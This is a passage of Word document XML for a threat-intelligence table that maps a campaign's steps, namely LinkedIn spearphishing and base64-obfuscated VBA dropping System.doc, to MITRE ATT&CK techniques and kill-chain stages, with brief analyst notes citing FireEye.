              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="005DEB38" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="002D1D50" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2E1583EF" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="002D1D50" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0A733155" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="002D1D50" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="00385303" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="002D1D50" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00063FEC" w:rsidRPr="002D1D50" w14:paraId="57E6C607" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12AB72BB" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="002D1D50" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="565D1F5A" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="002D1D50" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D88AFD3" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="002D1D50" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FCE1802" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="002D1D50" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="707BBCD8" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="002D1D50" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5608AC8B" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="002D1D50" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25D036ED" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="002D1D50" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FD7E130" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="002D1D50" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00063FEC" w:rsidRPr="002D1D50" w14:paraId="0C4910E7" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B47E158" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="002D1D50" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F9CCEE7" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="002D1D50" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DBA36E7" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="002D1D50" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BD92498" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="002D1D50" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="645DAB8A" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="002D1D50" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="788AC28B" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E564089" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="002D1D50" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC</w:t>
            </w:r>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DF6B34B" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="002D1D50" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F23177" w:rsidRPr="00B857D7" w14:paraId="55294496" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01666F90" w14:textId="2B391B24" w:rsidR="00F23177" w:rsidRDefault="00F23177" w:rsidP="00F23177">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51D2A98C" w14:textId="08ABEBCA" w:rsidR="00F23177" w:rsidRPr="00B857D7" w:rsidRDefault="00F23177" w:rsidP="00F23177">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260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19BF4F95" w14:textId="373AF8CE" w:rsidR="00F23177" w:rsidRPr="00B857D7" w:rsidRDefault="00F23177" w:rsidP="00F23177">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1566.00</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F23177">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">Phishing: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F23177">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Spearphishing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F23177">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> via Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B5CBF66" w14:textId="6C143915" w:rsidR="00F23177" w:rsidRDefault="00F23177" w:rsidP="00F23177">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="102795B5" w14:textId="77777777" w:rsidR="00F23177" w:rsidRPr="00B857D7" w:rsidRDefault="00F23177" w:rsidP="00F23177">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59A6F893" w14:textId="5EDEC4E0" w:rsidR="00F23177" w:rsidRDefault="00F23177" w:rsidP="00F23177">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="759B059A" w14:textId="2C737A4E" w:rsidR="00F23177" w:rsidRDefault="00F23177" w:rsidP="00F23177">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-SEN/IF-DEL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D3EF4B6" w14:textId="77777777" w:rsidR="00F23177" w:rsidRDefault="00F23177" w:rsidP="00F23177">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00FB3722" w:rsidRPr="00FB3722">
              <w:t>The usage of LinkedIn to deliver malicious documents</w:t>
            </w:r>
            <w:r w:rsidR="00FB3722">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="159B854B" w14:textId="77777777" w:rsidR="00FB3722" w:rsidRDefault="00FB3722" w:rsidP="00F23177">
            <w:r w:rsidRPr="00FB3722">
              <w:t>FireEye identified that System.doc was dropped by a file named ERFT-Details.xls. Network evidence also showed the access of a LinkedIn message directly preceding the spreadsheet download.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5732DBDB" w14:textId="5CF580AD" w:rsidR="00F6295E" w:rsidRDefault="00F6295E" w:rsidP="00F23177">
            <w:r w:rsidRPr="00F6295E">
              <w:t>Utilizing Cambridge University to Establish Trust</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F125AD" w:rsidRPr="00B857D7" w14:paraId="68B7E6A9" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52978901" w14:textId="7218CF50" w:rsidR="00F125AD" w:rsidRDefault="00F125AD" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A6FC701" w14:textId="42F5B54C" w:rsidR="00F125AD" w:rsidRPr="00B857D7" w:rsidRDefault="00F125AD" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F125AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F125AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F125AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F125AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F125AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D322A75" w14:textId="4A4A1BF1" w:rsidR="00F125AD" w:rsidRPr="00B857D7" w:rsidRDefault="00F125AD" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F125AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F125AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1027 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F125AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1893B415" w14:textId="7CF5B5D4" w:rsidR="00F125AD" w:rsidRDefault="00F125AD" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75703A7B" w14:textId="77777777" w:rsidR="00F125AD" w:rsidRPr="00B857D7" w:rsidRDefault="00F125AD" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D806B01" w14:textId="3CD61BCF" w:rsidR="00F125AD" w:rsidRDefault="00F125AD" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7295FBF9" w14:textId="3DD08A9F" w:rsidR="00F125AD" w:rsidRDefault="00F125AD" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EF06DF9" w14:textId="3EA78114" w:rsidR="00F125AD" w:rsidRDefault="00F125AD" w:rsidP="002F6F9E">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00F125AD">
              <w:t>VBA code</w:t>
            </w:r>
            <w:r w:rsidR="006B5E77">
              <w:t xml:space="preserve"> (fig 2)</w:t>
            </w:r>
            <w:r w:rsidRPr="00F125AD">
              <w:t>, creates System.doc in the target directory from base64-encoded text upon opening.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B58F4" w:rsidRPr="00B857D7" w14:paraId="7CD07E8C" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="442D0C59" w14:textId="6FCCDB48" w:rsidR="007B58F4" w:rsidRDefault="007B58F4" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F3F82E2" w14:textId="78A8C26A" w:rsidR="007B58F4" w:rsidRPr="00B857D7" w:rsidRDefault="00486034" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
